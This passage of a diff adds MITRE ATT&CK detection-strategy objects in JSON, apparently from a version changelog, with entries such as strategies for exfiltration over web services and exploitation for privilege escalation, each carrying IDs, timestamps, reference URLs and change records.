+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1d8154f6-6890-4441-863f-007600867088",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0015",
+                            "external_id": "DET0015"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Exclusive Control",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--16e57a41-f305-4aa7-9125-15272052419e",
+                        "x-mitre-analytic--0a1f9686-4fd6-4719-84ef-7a590d02d1fb",
+                        "x-mitre-analytic--f84124d2-8bc6-4dae-a579-f0ddb0338a2f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--beb3a98c-f1a4-434a-81e7-29d178b14db2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0348",
+                            "external_id": "DET0348"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Exfiltration Over C2 Channel",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--28c16139-9ce1-4dd7-b26a-e257f37e246c",
+                        "x-mitre-analytic--6914dd62-46a6-4de4-9c0b-afe1cb5b075d",
+                        "x-mitre-analytic--deb57305-6324-404d-a9d0-00aa0c285920",
+                        "x-mitre-analytic--f8998263-e55f-428f-b8d0-46d9e31277d2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1753ab98-4530-4284-9bc3-5d4813abfb9e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.670000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0548",
+                            "external_id": "DET0548"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Exfiltration Over Web Service",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--81b1e9a7-b6f4-4cca-b07a-3498ab4abd4a",
+                        "x-mitre-analytic--8a5a1b1e-336f-41af-8f30-2fa7e8e10fab",
+                        "x-mitre-analytic--d49c13ed-df07-4bb3-a2dc-43411e5d402a",
+                        "x-mitre-analytic--177bb119-93cc-4319-b9a7-e8d308d958c4",
+                        "x-mitre-analytic--f1f23910-7ecd-498b-92e8-7b5aa0d53ac8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.670000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--dcc26ef4-3ecd-4b37-b4b4-66faee084352",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0153",
+                            "external_id": "DET0153"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Exfiltration Over Webhook",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--98bd8e15-68ea-43a3-982b-66fcd1142c9a",
+                        "x-mitre-analytic--053dd0c5-9746-46ea-bdeb-b385bf5cbbf8",
+                        "x-mitre-analytic--d7f9b07f-401c-4685-a014-6a824f95f866",
+                        "x-mitre-analytic--37166782-8770-4812-b70c-27f3c705489b",
+                        "x-mitre-analytic--4b72b349-f810-4e34-9185-b5550147147e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c8895822-a3d1-41eb-952f-c67b4673eee2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0570",
+                            "external_id": "DET0570"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Exfiltration to Cloud Storage",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a74c34c2-f4bf-4bd0-9f23-7c04c45b93ca",
+                        "x-mitre-analytic--5012d2b2-bd36-431c-91d3-4c10b7d3a9d6",
+                        "x-mitre-analytic--535e9bc8-b033-4aee-88e1-bd48699b7856",
+                        "x-mitre-analytic--682f84f1-5571-4d41-b071-53c8f72a88f1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ac9c6b7c-bf94-4eeb-926c-f576673c0a14",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0318",
+                            "external_id": "DET0318"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Exfiltration to Code Repository",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7c7f0049-96af-4acc-9c58-9f8e661adb63",
+                        "x-mitre-analytic--8049e0b4-961b-499f-9204-45fa9b7117be",
+                        "x-mitre-analytic--70b2ab8e-f18e-4cb5-8149-4ba2c334df69",
+                        "x-mitre-analytic--e18f0682-6610-4ba8-8159-a4afea3b7974"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6ab41bc0-2d89-4173-8149-728fbc2698b6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0284",
+                            "external_id": "DET0284"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Exfiltration to Text Storage Sites",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4e8da615-4d12-4b53-8c7b-06d7c41e22a9",
+                        "x-mitre-analytic--dd202a3f-c73b-47cf-9689-f14a8def816e",
+                        "x-mitre-analytic--cf74f802-0080-41ff-8745-9c42af313462",
+                        "x-mitre-analytic--58a609cb-b266-4a1a-a40f-9e4cd5d591ce"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--13a856f3-66b2-4ab7-b73f-2a26e712e77f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0174",
+                            "external_id": "DET0174"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Exploitation for Credential Access",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2d4a40e4-359f-49ac-9e3f-58e29497aa41",
+                        "x-mitre-analytic--3f3ae0da-3005-42d7-afa3-8eaa8da3f700",
+                        "x-mitre-analytic--bb339113-e807-45fe-99c4-ed8348e51b36",
+                        "x-mitre-analytic--0b8b8557-0393-4c63-963f-e5a3b5cc6ad8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--64fc24f5-0428-4956-a328-2e76e0af984e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0514",
+                            "external_id": "DET0514"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Exploitation for Privilege Escalation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b01d212c-112a-47fb-8883-78bb623ee34b",
+                        "x-mitre-analytic--1327b96f-73db-4a5e-8e71-e515fc030bf3",
+                        "x-mitre-analytic--0066bac9-599a-4f7b-a667-9cb1dca94347",
+                        "x-mitre-analytic--2a93100f-6332-4c91-bad9-fd371d638309"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--da1e3af8-d79b-44ff-a907-ae107c110671",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.391000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0595",
+                            "external_id": "DET0595"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Exploitation for Stealth",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e5b0fcab-05e5-4687-a1a9-dd382a19980b",
+                        "x-mitre-analytic--ecf26d05-48ef-43b2-bfc3-4ea331be735b",
+                        "x-mitre-analytic--88d9dbea-cc85-4c94-a368-e5c1a603854b",
+                        "x-mitre-analytic--458038e6-60a2-47d2-bd55-675e77f0e279",
+                        "x-mitre-analytic--77c3b78a-fb34-4040-9dda-057e8eca3362"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.391000+00:00\", \"old_value\": \"2026-04-24T20:26:05.352Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e32dbff1-9d06-4495-b815-48463481581b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0406",
+                            "external_id": "DET0406"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Extended Attributes Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f398e8ff-8c61-4672-8ace-118b11a38515",
+                        "x-mitre-analytic--f5a0dc9d-3dda-4e31-ad4d-0560b918b6b1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1a8d87f1-48ca-4929-a5cc-2b2a03983f12",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0217",
+                            "external_id": "DET0217"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Extra Window Memory (EWM) Injection on Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6ec034ac-289d-48d1-b310-021dfbf7087b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--74252ca3-585e-466f-8020-ed77ebda3369",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0150",
+                            "external_id": "DET0150"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for File Creation or Modification of Boot Files",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7edc8ff6-0616-4fab-a7b7-1bd3d08cc0b1",
+                        "x-mitre-analytic--3d209345-1676-4170-b1d0-d6538bce06c4"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f9175415-59ba-497c-b96f-639e01f4cf4e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0051",
+                            "external_id": "DET0051"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for File/Path Exclusions",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--620cae28-1874-462d-a2e4-47ddd75098ea",
+                        "x-mitre-analytic--fd7bf05d-6f80-471c-99bf-7aa82ab25440",
+                        "x-mitre-analytic--3643a313-1aa7-44d1-b3e2-e97ad65c6837"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--aea09aae-c0c3-4453-aa44-ea0153e5cb8c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0344",
+                            "external_id": "DET0344"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Fileless Storage via Registry, WMI, and Shared Memory",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4f5f4b26-0bf0-4f3d-b8ac-1af660923bd2",
+                        "x-mitre-analytic--b521510b-83bc-46a2-8fc8-65a6975bcfca"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e767f434-dda3-41fe-a9ea-e7aaae251e61",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0495",
+                            "external_id": "DET0495"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Financial Theft",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f2aef85a-c1ea-4d1a-b359-32692c973cdc",
+                        "x-mitre-analytic--efdca1e1-5a4a-4039-99ab-1cdb7e50e52c",
+                        "x-mitre-analytic--ce3ebda8-d47e-4730-a1f4-3366d33a98ab",
+                        "x-mitre-analytic--3bac57c4-1539-4048-b325-88032c78ed08",
+                        "x-mitre-analytic--03364dc1-4b76-4a30-83cf-ae101b960d8e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
